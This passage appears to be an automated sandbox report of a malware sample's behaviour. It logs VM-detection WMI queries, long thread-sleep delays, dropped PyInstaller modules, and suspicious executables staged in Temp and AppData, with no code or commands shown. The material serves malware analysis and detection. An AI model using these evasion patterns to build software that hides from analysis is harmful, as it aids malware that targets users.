Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID="1"} WHERE ResultClass=Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element="Win32_NetworkAdapter.DeviceID=\"1\""

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\bound.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\bound.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Source: C:\Users\user\AppData\Local\Temp\bound.exe	Memory allocated: B40000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Memory allocated: 1A5C0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\word.exe	Memory allocated: 1350000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\word.exe	Memory allocated: 1B1B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\word.exe	Memory allocated: C30000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\word.exe	Memory allocated: 1A9A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\word.exe	Memory allocated: 1200000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\word.exe	Memory allocated: 1ABD0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\word.exe	Memory allocated: 3020000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\word.exe	Memory allocated: 1B060000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\word.exe	Memory allocated: 10A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\word.exe	Memory allocated: 1AE40000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\word.exe	Memory allocated: 1460000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\word.exe	Memory allocated: 1AFE0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\word.exe	Memory allocated: 15D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\word.exe	Memory allocated: 1B1A0000 memory reserve \| memory write watch

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\word.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\word.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\word.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\word.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\word.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\word.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\word.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2496	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3370	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Window / User API: threadDelayed 4609
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Window / User API: threadDelayed 4909
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2520
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2764
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 647
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5358
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5830
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 498
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3319
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2902
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 788
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3984

Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI58162\_queue.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI58162\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI58162\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI58162\_socket.pyd	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\tuy1nspn\tuy1nspn.dll	Jump to dropped file
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI58162\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI58162\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI58162\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI58162\select.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI58162\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI58162\python312.dll	Jump to dropped file
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI58162\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI58162\_ctypes.pyd	Jump to dropped file

Source: C:\Users\user\Desktop\sB2ClgrGng.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_0-17362

Source: C:\Users\user\Desktop\sB2ClgrGng.exe

API coverage: 4.8 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7568	Thread sleep count: 2496 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7516	Thread sleep count: 143 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8076	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7364	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7560	Thread sleep count: 3370 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7512	Thread sleep count: 135 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8092	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7728	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bound.exe TID: 8716	Thread sleep time: -15679732462653109s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7576	Thread sleep count: 2520 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8088	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7700	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7572	Thread sleep count: 2764 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7572	Thread sleep count: 47 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8104	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7720	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8140	Thread sleep count: 647 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4564	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8160	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7832	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7368	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\word.exe TID: 9076	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8604	Thread sleep count: 5358 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8696	Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8600	Thread sleep count: 341 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8672	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8340	Thread sleep count: 5830 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8340	Thread sleep count: 498 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8252	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7944	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8748	Thread sleep count: 3319 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8980	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8760	Thread sleep count: 84 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 180	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\word.exe TID: 9024	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\word.exe TID: 7592	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8808	Thread sleep count: 2902 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8808	Thread sleep count: 788 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9052	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6980	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7416	Thread sleep count: 3984 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7648	Thread sleep count: 147 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8228	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8040	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Users\user\AppData\Roaming\word.exe TID: 9084	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\word.exe TID: 8996	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\word.exe TID: 7412	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\word.exe TID: 7340	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Windows\System32\systeminfo.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\bound.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\bound.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\bound.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\bound.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\bound.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\bound.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\bound.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\bound.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\bound.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\bound.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\bound.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\bound.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\bound.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\bound.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\bound.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\bound.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\bound.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\bound.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\bound.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\bound.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\bound.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\bound.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\bound.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\bound.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\bound.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\bound.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\bound.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\bound.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\bound.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\bound.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\bound.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\bound.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\bound.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\bound.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\bound.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\bound.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\bound.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\bound.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\bound.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\bound.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\word.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\word.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\word.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\word.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\word.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\word.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\word.exe	File Volume queried: C:\ FullSizeInformation

